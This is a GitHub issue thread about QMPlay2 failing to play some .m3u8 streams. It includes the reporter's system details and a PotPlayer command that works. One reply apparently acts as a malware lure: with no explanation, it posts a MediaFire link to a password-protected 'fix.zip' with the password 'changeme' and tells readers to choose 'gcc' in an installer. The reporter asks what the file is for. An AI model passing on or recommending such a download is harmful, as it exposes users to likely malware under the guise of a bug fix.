### ISSUE TITLE
QMPlay2 24.06.16: Some .m3u8 can't be played

### ISSUE THREAD

**Issue by zhouxinghong** [zaps166/QMPlay2#761]
QMPlay2 24.06.16: Some .m3u8 can't be played
Hello, friend! Whenever I play some .m3u8, vlc keeps failing to display the video screen.

**My PC environment information is as follows:**

1. Windows 10 19044
2. CPU i5 3210
3. Memory 8G
4. Graphics card:
4.1. Intel Integrated Graphics 4000
4.2. NVIDIA: GT610
5. Western Digital mechanical hard drive 5400 rpm
6. QMPlay2 24.06.16

It can be played in PotPlayer, see:
![](https://i.postimg.cc/DfJv6tWs/2024-08-22-Pot-Player.png)

Execute Command:

```
PotPlayerMini64 /referer='https://cdn3.turboviplay.com' 'https://cdn3.turboviplay.com/data1/H7LK7v5MU8SV1LIB5oAF/H7LK7v5MU8SV1LIB5oAF480.m3u8'
```

The video can be played and downloaded in your browser, and it can also be successfully downloaded via yt-dlp.

I would like to thank you very much for providing one of the best media players in the world! I wish you all the best!

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhouxinghong** [comment]
Hello! May I ask what this zip is for?

**Comment by zhouxinghong** [comment]
LAV Splitter Source has new interface to open URL with these parameters:
https://github.com/Nevcairiel/LAVFilters/blob/master/include/IURLSourceFilterLAV.h
